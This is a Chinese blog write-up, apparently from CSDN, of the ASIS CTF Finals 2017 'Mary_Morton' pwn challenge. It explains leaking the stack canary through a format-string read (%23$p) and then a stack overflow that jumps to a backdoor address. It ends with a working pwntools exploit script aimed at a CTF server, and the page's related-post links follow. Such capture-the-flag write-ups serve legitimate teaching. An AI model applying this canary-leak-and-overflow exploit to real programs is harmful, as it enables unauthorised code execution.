Mary_Morton(ASIS-CTF-Finals-2017)--writeup

最新推荐文章于 2022-03-29 21:45:37 发布
最新推荐文章于 2022-03-29 21:45:37 发布
阅读量497 收藏 4
点赞数 21
分类专栏: CTF-PWN # 攻防世界-pwn -- WriteUp 文章标签: CTF pwn 栈溢出 格式化字符串 canary
本文为ATFWUS原创,允许转载,但请附上作者署名和本文链接
本文链接:https://blog.csdn.net/ATFWUS/article/details/104633310
版权

文件下载地址:

链接:https://pan.baidu.com/s/1on3lMupdI7YfPkQj7AmzEw
提取码:amqq

0x01.分析

checksec:

64位程序,开启了Canary,NX。

对源码得简单分析发现,程序提供了两个漏洞,格式化字符串漏洞和栈溢出,并且发现了程序得后门:

但是开启了cannary,我们无法直接覆盖返回地址,所以,我们必须利用格式化字符串漏洞泄露canary的值,然后再覆盖道system的地址。

首先需要确定格式化字符串的偏移:


 

可以看出偏移是6,说明在第六个参数的位置,第六个参数存在栈上(相对于函数来说是第7个),然后得确定一下canary的位置:

 

buf和canary相差0x90-8=0x88,每8个字节为一个参数,则可以计算出0x88/8=17,说明在字符串实际参数的后17个,对于格式化字符串来说是第17+6=23个,也就是说canary是格式化字符串的第23个参数,那么我们就可以通过这里得到canary的值,栈溢出的时候再覆盖canary的值就行了。

0x02.exp

##!/usr/bin/env python
from pwn import*

r=remote("111.198.29.45",58280)
#r=process('./Mary_Morton')
context.log_level = "debug"

flag_addr=0x00000000004008DA

r.sendlineafter("battle ","2")
payload="%23$p"

r.sendline(payload)
r.recvuntil("0x")
canary = int(r.recv(16),16)

r.sendlineafter("battle ","1")
payload=0x88*'A'+p64(canary)+8*'A'+p64(flag_addr)
r.sendline(payload)
r.interactive()

 

问题:在本地测试的时候,一直卡在接收地址那里,但远程没有问题,待解决。

ATFWUS
关注
  • 21
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
d3-morton-order:D3布局,使用连续的莫顿(Z阶)空间填充曲线可视化距离变量
05-05
快速开始import d3ZOrder from 'd3-morton';或者d3.zOrder = require('d3-morton');甚至[removed][removed]然后const myRange = { start: 4, length: 9 };d3.zOrder() .order(2) .layout(myRange)API参考方法描述...
攻防世界pwn——Mary_Morton
最新发布
qq_62076255的博客
12-19 182
做题记录
ASIS-CTF-Finals-2017 Mary_Morton
qq_41071646的博客
01-11 1306
讲道理 这个 其实 感觉有两个方法  两种方法 都要调用一下    第一个  printf函数      第一个是 我们第一个可以    用printf  然后hook掉got的printf  不知道好不好实现  自己搜索了 资料 也没有发现  第二个 就是观察栈了  。。。。。。。 这里有个保护   就是  readfsqword  在 ida 的f5看的不是很清楚 我们 看 汇编窗...
ASIS-CTF-Finals-2017-Handicraft_RSA
MangoFengC++
03-29 853
题目 下载得到一个附件 f5346507773f4b909479387d59a01710 用Notepad++打开看看 ?zXZ 嬷碏 ! t/澹?j] 4J 鹘?d(/脘R?.窗(3幐U嶴D慗∑r嘔c縹谮}厍DZワk'磰~傊[杢?铹秄掑醾祖倻R{]`糷*2誻]~?Ъ师宼臬!?釼8Vi(船k~櫘?^霏蛽伸O蚬6ο 輐j/恵1瑅?? 搥?m溣/?簂[%秫蕮Iv?鸡v7卽?噽e逸弓:殮簎樍畉洅b蘕*嗹゜?ZYSf繜烰 !嚣飔痍燬藈N) H??{?h?x襸M櫚
XCTF-攻防世界CTF平台-PWN类——1、Mary_Morton格式化字符串漏洞、缓冲区溢出漏洞)
Onlyone_1314的博客
09-09 1398
目录标题一级目录二级目录1、查看程序基本信息2、反编译程序3、攻击思路(1)先利用功能2格式化字符串漏洞(2)找到功能1的sub_400960()函数返回地址的位置方法二 一级目录 二级目录 1、查看程序基本信息 Mary_Morton程序,先用file查看: Linux下64位的ELF文件 再用checksec查看 程序开启了Partial RELRO、NX和Canary,没有PIE。程序开启了canary,就不能直接利用栈溢出覆盖返回地址了。因为在初始化一个栈帧时在栈底(stack overflow
ASIS-CTF-Finals-2017 pwn Mary_Morton Writeup
qq_39596232的博客
09-03 620
题目描述: ASIS-CTF-Finals-2017 非常简单的热身pwn 分析思路: 1、首先查看文件的安全信息: tucker@ubuntu:~/xman/pwn$ file Mary_Morton Mary_Morton: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, interp...
morton-java:莫顿PackUnpack库
05-12
Morton64 m = new Morton64 ( 2 , 32 ); // 2 dimenstions 32 bits eachlong code = m . pack( 13 , 42 ); // pack two valueslong [] values = m . unpack(code); // should get back 13 and 42
libmorton:C ++仅限标头的库,其方法可以从2D3D坐标有效地编码Morton代码
05-05
Libmorton是仅C ++头文件的库,提供了以2D和3D有效编码/解码64位,32位和16位Morton代码和坐标的方法。 莫顿阶也称为Z阶或。 Libmorton是一个轻量级且可移植的库-唯一的依赖项是标准C ++头文件。 提供特定于体系...
morton:高效且正确的 Z-Order 寻址
06-17
例子 package mainimport ("log""math/rand""github.com/markchadwick/morton")func main () {// First, pick two random numbers and log them to stdoutx0 := uint32 ( rand . Int31 ())y0 := uint32 ( rand . Int...
Comparing-Filters:对基于Bloom,Cuckoo,Morton和PD的过滤器进行基准测试
04-04
比较过滤器 当前基准测试: 布隆过滤器(BF) 布谷鸟过滤器(CF) SIMD阻止布隆过滤器(SIMD) 莫顿滤镜(MF) 袖珍词典过滤器(PD) 验证 文件test.hpp test.cpp包含对过滤器的验证测试。...
Mary_Morton [XCTF-PWN][高手进阶区]CTF writeup攻防世界题解系列17
重新启程
12-24 1579
题目地址:Mary_Morton 已经是高手进阶区的第六题了,每个题目都有不少收获,持之以恒! 先看看题目内容 很好,这是一道非常简单的热身pwn,当然,我是不会相信的!哈哈 大家应该注意到了,难度系数第一次>1星了,步入2星的阶段,最高是10星!期待一下 惯例先来检查安全机制 root@mypwn:/ctf/work/python/mary_morton# checksec ...
(攻防世界)(pwnmary_mroton
PLpa的博客
07-20 868
经过一段时间的研究,终于接触到Canary了,不容易啊 拿到本题查看保护 开了NX和Canary两种栈保护,我们运行一下出现,看一下程序逻辑: 根据我们对英语强大的理解 (翻译软件的腻量)我们可以看到1标题是栈溢出漏洞函数,2是格式字符串漏洞函数,3为退出,既然他都告诉我们了,我们也不用客气直接用就可以了。 我们可以用格式字符串漏洞泄露Canary的值,然后再进行简单的栈溢出,把Canary填...
Mary_Morton write up(pwn 64位格式化字符串栈溢出
weixin_43742794的博客
08-06 848
Morton.dms 首先用gdb(已安装peda)打开文件 用checksec检查可执行文件属性 CANNARY(栈保护) 即是否在栈中插入了cookie(linux中称为canary FORTIFY 防止缓冲区溢出攻击 不常见 NX(Windows平台上称其为DEP)即No-eXecute(不可执行)的意思,NX(DEP)的基本原理是将数据所在内存页标识为不可执行,当程序溢出成功转入she...
2019.10.10攻防世界 Mary_Morton
DSR446的博客
10-10 322
根据索引rbp提供的信息,我们知道,canary位置距离rbp为0x8,而我们的输入参数距离rbp为0x90。且这是一个64位程序。我们可以计算canary的偏移 = 6(6个寄存器)+(0x90-0x8)/8 = 23 :这里子所以减0x8是减的rbp。 【注】:这个程序缺少符号表且没有开PIE,所以我们在下断点的到时候通过在ida中找相应的地址,不用加上程序的加载地址。 最后的 ...
格式化字符串泄露canary栈溢出
SsMing的博客
01-11 4301
ASIS-CTF-Finals-2017 Mary_Morton为例 checksec查看,开了NX保护,还有canary IDA打开 void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { const char *v3; // rdi int v4; // [rsp+24h] [rbp-Ch] ...
攻防世界Mary_Morton
像初雪一样自由洒落
02-16 929
64位程序,开启了canary和nx保护 执行以下,效果如下: 有提示: 输入1那块存在栈溢出 输入2那块存在格式化字符串漏洞 拖到ida看一下 main函数: 栈溢出的函数: 有canary保护,根据程序可以看出,v2应该就是canary的值,一开始,将_readfsqword(0x28u)的值给v2,后来又和v2做异或操作,只有v2与它还相等,...
mary_morton
pppp974的博客
07-22 1113
mary_morton 这道题开启了canary保护,大概说一下题目,就是让你选择漏洞一个格式化字符漏洞还有一个就是栈溢出,这道题思路就是通过格式化字符漏洞泄露出cannary的值,然后进行栈溢出,后门题目已经给了。 来算算偏移量吧,buf为rbp-90h,canary就是v2为rbp-8h,所以偏移量为88h,然后在算一算格式化字符与Buf的偏移量就可以算出要多少字节来进行泄露了。调了一下,输...
Asis CTF 2016 b00ks
Bill
04-01 2822
Asis CTF 2016 b00ks 1. 序言   本篇文章是对CTF WIKI Off-By-One漏洞类型的补充. CTF WIKI上面Off-By-One这一章节中两个例子均没有给出相应的EXP, 本次总结将其中一个例子详细分析一下, 希望能够对其他学习者有帮助 2. 程序简介 该程序是一个图书管理系统,可以添加书名,修改作者名以及写备注...
并行快速排序算法:优化3D质点云处理
该算法利用莫顿阶(Morton Code)对点云数据进行一维化处理,将点存储在八叉树结构链中,并在CPU和GPU上实现基于欧几里得距离的并行快速排序。通过这种方式,可以有效地找到每个点的k个最近邻,显著节省计算时间,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ATFWUS

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值